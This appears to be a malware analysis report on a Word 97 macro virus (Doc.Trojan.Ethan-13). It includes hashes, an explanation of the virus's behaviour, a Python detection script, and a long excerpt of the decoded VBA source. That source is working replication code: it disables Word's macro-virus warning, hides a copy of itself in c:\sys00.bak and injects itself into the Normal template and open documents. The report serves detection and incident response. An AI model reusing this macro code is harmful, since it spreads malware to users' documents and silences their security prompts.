Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 10840cf1072d3436…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 54.0 KB
Created: 2003-10-01 00:11:00
Authoring application: Microsoft Word 8.0 (Word 97)
First seen: 2019-03-18
MD5: 28247147176b6088962ddece2bae947b
SHA-1: 84c90825646a6d417b250836eb13c6637d8595fd
SHA-256: 10840cf1072d34366128f42ddfaf9687f9b67e1c794c923ee85cb7c90d0f2caa
Risk score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic

ClamAV identifies the sample as malicious with the signature Doc.Trojan.Ethan-13. Static analysis found a VBA project whose ThisDocument module contains a Document_Close handler, so the code runs every time the document is closed once macros are enabled. The handler first removes the signals a user would otherwise see: On Error Resume Next swallows failures, Application.EnableCancelKey = Not -1 (which evaluates to 0, wdCancelDisabled) blocks Ctrl+Break, and Options.VirusProtection, Options.SaveNormalPrompt and Options.ConfirmConversions are all set to 0, switching off Word 97's macro-virus warning and the prompt to save changes to Normal. It then writes its own source, read back through MacroContainer.VBProject, to c:\sys00.bak and marks that file hidden and system (SetAttr ..., 6). That file is the copy source for replication: if line 2 of the first module in the Normal template is not the marker comment 'y2k, the source is inserted into the Normal template, which infects every document opened afterwards; otherwise, if the active document is unmarked, the source is inserted there and the document is saved in place, restoring the original Saved flag so nothing looks changed. This is the self-replication pattern of a Word macro virus, and it is the reason the Normal template and c:\sys00.bak should be checked on any host where the file was opened. The visible payload is a series of MsgBox lectures on Y2K preparation keyed to specific dates in 1999 before 13:00; because the code reassigns mm from Month(Now) to Minute(Now) before the date checks, those comparisons actually test the current minute, so the messages rarely fire and their absence in a dynamic run says nothing about the replication logic.

Heuristics (2)

  • ClamAV: Doc.Trojan.Ethan-13 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ethan-13
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
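The summary and the two heuristics above describe what to look for; the following Python turns that into a repeatable check over decoded VBA source such as the macros.bas artifact listed below. It is an added example for this page, not part of the report's pipeline or of oletools, and needs only the standard library. The indicator list is an assumption drawn from the behaviours visible in the extracted macro rather than a published signature, and SAMPLE is a constructed excerpt of that macro, not the full module.

```python
"""Static triage of decoded VBA source for the behaviours flagged in the report.

Added example; not part of the report's pipeline or of oletools. Works on
decoded module text (what olevba writes out as macros.bas) using only the
standard library. The indicator set is an assumption based on the behaviours
visible in the extracted macro, not a published signature.
"""
import re
from collections import namedtuple

Hit = namedtuple("Hit", "line category text")

# Procedures Word runs on its own (auto-execute entry points). A macro hooked
# to one of these, as this sample is to Document_Close, needs no user action
# beyond enabling macros.
AUTOEXEC = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
    r"(?:AutoOpen|AutoClose|AutoExec|AutoNew|Document_Open|Document_Close|Document_New)\b",
    re.IGNORECASE,
)

# (category, regex) pairs, matched per line. Assumed set for this report.
INDICATORS = [
    ("disable-macro-warning", r"\.VirusProtection\s*=\s*0\b"),   # Word 97 macro virus protection off
    ("silence-prompts", r"\.(?:SaveNormalPrompt|ConfirmConversions)\s*=\s*0\b"),
    ("block-user-abort", r"\bEnableCancelKey\s*="),               # Ctrl+Break disabled
    ("suppress-errors", r"^\s*On\s+Error\s+Resume\s+Next\b"),
    ("vbproject-access", r"\.VBProject\.VBComponents\b"),        # reads or writes other modules
    ("normal-template", r"\bNormalTemplate\.VBProject\b"),       # target is Normal.dot
    ("code-injection", r"\.CodeModule\.(?:InsertLines|AddFromString|AddFromFile)\b"),
    ("dropper-write", r"^\s*Open\s+\".*?\"\s+For\s+Output\b"),    # writes a file to disk
    ("hide-file", r"^\s*SetAttr\b"),                              # hidden/system attributes
]
COMPILED = [(cat, re.compile(rx, re.IGNORECASE)) for cat, rx in INDICATORS]

ATTRIBUTE = re.compile(r"^\s*Attribute\s+VB_", re.IGNORECASE)


def scan_vba(source):
    """Return every (line number, category, text) indicator hit in the module."""
    hits = []
    for no, line in enumerate(source.splitlines(), start=1):
        if AUTOEXEC.match(line):
            hits.append(Hit(no, "autoexec", line.strip()))
        for cat, rx in COMPILED:
            if rx.search(line):
                hits.append(Hit(no, cat, line.strip()))
    return hits


def code_pane_lines(source):
    """Number lines the way CodeModule.Lines does: olevba output keeps the
    Attribute VB_* header that the VBA editor hides, so drop those lines."""
    return [ln for ln in source.splitlines() if not ATTRIBUTE.match(ln)]


def is_marked_infected(source, marker="'y2k"):
    """The sample's own infection test: is code-pane line 2 the marker comment?
    Usable against a dumped Normal.dot module or c:\\sys00.bak during response."""
    lines = code_pane_lines(source)
    return len(lines) >= 2 and lines[1].strip() == marker


def verdict(hits):
    """Coarse call from the categories seen; thresholds are a judgement call."""
    cats = {h.category for h in hits}
    if "autoexec" in cats and cats & {"normal-template", "code-injection"}:
        return "likely macro virus: auto-run entry point plus self-copy into another module"
    if "autoexec" in cats and "vbproject-access" in cats:
        return "suspicious: auto-run entry point plus VBProject access"
    return "review manually" if hits else "no indicators"


# Constructed excerpt of the extracted macro shown in this report (not the full module).
SAMPLE = r'''Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Private Sub Document_Close()
'y2k
On Error Resume Next
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
If Dir("c:\sys00.bak", 6) = "" Then
   Open "c:\sys00.bak" For Output As #1
   Close #1
   SetAttr "c:\sys00.bak", 6
End If
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'y2k" Then
   Set tf = NormalTemplate.VBProject.VBComponents.Item(1)
End If
tf.CodeModule.InsertLines i, a
End Sub
'''

if __name__ == "__main__":
    for h in scan_vba(SAMPLE):
        print(f"{h.line:4d} {h.category:22s} {h.text}")
    print("marker present:", is_marked_infected(SAMPLE))
    print("verdict:", verdict(scan_vba(SAMPLE)))
```

Feed it the decoded module text that olevba writes out (the same tool that produced the artifact below) and it lists each hit with its line number; the marker check is the one to run against a suspect host's Normal template after stripping the Attribute header, since the sample itself compares code-pane line 2 rather than file line 2.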

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 19117 bytes
SHA-256: f823ceb47773c813b49795eba88a4ddc851e68e3517e86700bfd5d8ebc28e776
Detection: ClamAV Doc.Trojan.Ethan-13
Obfuscation or payload: unlikely
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'y2k
' Open Letter to the Virus Hunters
'
' This virus was written to help educate the
' public about the dangers of the approaching
' millennium bug. Please do not update your
' virus scanners to detect or clean this virus
' until after December 1, 1999.
'
' I know you won't do that, but what the heck.
'
' I tried.
'
' Bye!
'
On Error Resume Next

s = ActiveDocument.Saved

Application.EnableCancelKey = Not -1

With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With

Randomize

If Dir("c:\sys00.bak", 6) = "" Then
   Open "c:\sys00.bak" For Output As #1
   For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
      a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
      Print #1, a
      Next i
   Close #1
   SetAttr "c:\sys00.bak", 6
End If

If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'y2k" Then
   Set tf = NormalTemplate.VBProject.VBComponents.Item(1)
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'y2k" Then
   Set tf = ActiveDocument.VBProject.VBComponents.Item(1)
Else
   tf = ""
End If

If tf <> "" Then
   Open "c:\sys00.bak" For Input As #1
   If LOF(1) = 0 Then GoTo q
   i = 1
   Do While Not EOF(1)
      Line Input #1, a
      tf.CodeModule.InsertLines i, a
      i = i + 1
   Loop
q:
   Close #1
   ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
   If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
End If

dd = Day(Now): mm = Month(Now): yy = Year(Now)
hh = Hour(Now): mm = Minute(Now): ss = Second(Now)

' only display messages for 1999
If yy <> 1999 Then
   GoTo end_here
End If

' only display messages until after lunch
If hh > 12 Then
   GoTo end_here
End If

t$ = Chr(13) + Chr(13)

'april 1, 1999
If dd = 1 And mm = 4 Then
   Title$ = "Y2K! Spread the word"
   msg$ = "This is not an April fools joke. I wish it were! The year 2000 is fast approaching, and the word still needs to be spread about the implications and dangers of the millennium bug commonly referred to as the Y2K bug. The virus that has infected this word document was written to help spread the word about the Y2K bug, and educate you so you can prepare yourself and your family for Saturday January 1, 2000."
   msg$ = msg$ + t$ + "From today until January 1, 2000, on the first business day of each month, I will give you a lesson in Y2K preparation."
   msg$ = msg$ + t$ + "Spread the word. Knowledge is power!"
   MsgBox msg$, vbCritical, Title$
End If
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
If dd = 2 And mm = 7 Then
   Title$ = "Did you get the stove?"
   msg$ = "Last month I recommend purchasing a gas stove to help heat your home in the event that your supply of electricity, gas, or oil was interrupted. This month I would like to suggest that you purchase a portable generator and enough gas cans to store gas to power the generator. The generator can be used to power lighting and small electrical appliances should the power be disrupted."
   msg$ = msg$ + t$ + "That's it for this month. See you next month!"
   MsgBox msg$, vbCritical, Title$
End If

'August 2, 1999
If dd = 2 And mm = 8 Then
   Title$ = "Getting back to basics"
   msg$ = "In this installment, I would like to suggest that you consider purchasing candles, matches, flashlights, and batteries. These items will be invaluable during those cold, dark nights should the power companies fail in their Y2K conversion. Don't plan on relying on the banks or credit/debit cards. Start each month, and stash away enough money to last you at least 2 months. This money should include enough money to pay the rent/mortgage, utilities, FOOD, etc. Remember cold hard cash
... (truncated)